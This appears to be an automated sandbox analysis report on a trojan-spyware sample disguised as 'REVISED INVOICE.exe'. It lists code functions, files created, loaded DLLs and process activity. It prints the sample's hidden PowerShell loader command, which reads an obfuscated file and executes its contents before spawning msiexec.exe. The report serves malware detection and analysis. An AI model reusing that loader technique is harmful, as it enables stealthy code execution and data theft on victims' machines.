          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21692B485_2_21692B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169134F5_2_2169134F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C5285_2_2169C528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F7285_2_2169F728
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21692B385_2_21692B38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169DB085_2_2169DB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169A9085_2_2169A908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216905085_2_21690508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D7E85_2_2169D7E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169BBC85_2_2169BBC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169EDC85_2_2169EDC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216909C05_2_216909C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216909D05_2_216909D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D1A85_2_2169D1A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216921AA5_2_216921AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216939A05_2_216939A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216921B85_2_216921B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B5885_2_2169B588
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E7885_2_2169E788
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216939905_2_21693990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B2685_2_2169B268
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21693E685_2_21693E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169E4685_2_2169E468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216926715_2_21692671
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C8485_2_2169C848
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169FA485_2_2169FA48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216900405_2_21690040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21693E575_2_21693E57
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169AC285_2_2169AC28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216918285_2_21691828
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169DE285_2_2169DE28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169FA385_2_2169FA38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169C2085_2_2169C208
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F4085_2_2169F408
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216930005_2_21693000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216918185_2_21691818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216930105_2_21693010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169BEE85_2_2169BEE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169F0E85_2_2169F0E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216904F85_2_216904F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21691CF05_2_21691CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169D4C85_2_2169D4C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216934C75_2_216934C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216934D85_2_216934D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21691CDF5_2_21691CDF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169EAA85_2_2169EAA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169B8A85_2_2169B8A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2169CE885_2_2169CE88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21690E8A5_2_21690E8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_216926805_2_21692680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21690E985_2_21690E98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722E785_2_21722E78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217235585_2_21723558
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21723C385_2_21723C38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217243185_2_21724318
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217249F85_2_217249F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217250D85_2_217250D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217257B85_2_217257B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722E685_2_21722E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217200405_2_21720040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217235485_2_21723548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217221305_2_21722130
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217221215_2_21722121
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21723C295_2_21723C29
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21722B005_2_21722B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217243085_2_21724308
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217249E85_2_217249E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21720ED85_2_21720ED8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_21720EC95_2_21720EC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217250C95_2_217250C9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_217257A85_2_217257A8
          Source: REVISED INVOICE.exe | Static PE information: invalid certificate
          Source: REVISED INVOICE.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/16@28/8
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | Code function: 0_2_00402095 CoCreateInstance
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | File created: C:\Program Files (x86)\Common Files\Hemicrane.ini
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | File created: C:\Users\user\AppData\Local\fona
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe | File created: C:\Users\user\AppData\Local\Temp\nsrC65B.tmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......!,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......3,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......?,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......Q,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......],.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......o,.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......{,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........,.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......:-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......L-.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......X-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4.......j-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......v-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ........-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s....................~.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. .......#..........................s............8....... .......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ......./..........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .$.A.f.t.o.p.p.e.d.e...I.n.v.o.k.e.(.$.M.a.s.k.i.n.g.e.v.r.,. .0.)...........8.......F.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......M....................... .0.)...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...........8.......F.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......k.......................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......}.......................~.~.~...........................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4......../.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......*/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......?/.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......K/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......]/.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......i/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......{/.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4......../.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......(0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......:0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......F0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......X0.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......d0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......v0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........0.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......#1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......51.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......A1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......T1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......a1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......~1.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........1.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........2.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......!2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......32.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......?2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........3.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."4.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................A4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................M4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................l4.........................s....................j.......................Jump to behavior
          Source: REVISED INVOICE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe File read: C:\Users\user\Desktop\REVISED INVOICE.exe
          Source: unknown Process created: C:\Users\user\Desktop\REVISED INVOICE.exe "C:\Users\user\Desktop\REVISED INVOICE.exe"
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Section loaded: wow64win.dll
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\REVISED INVOICE.exe Section loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
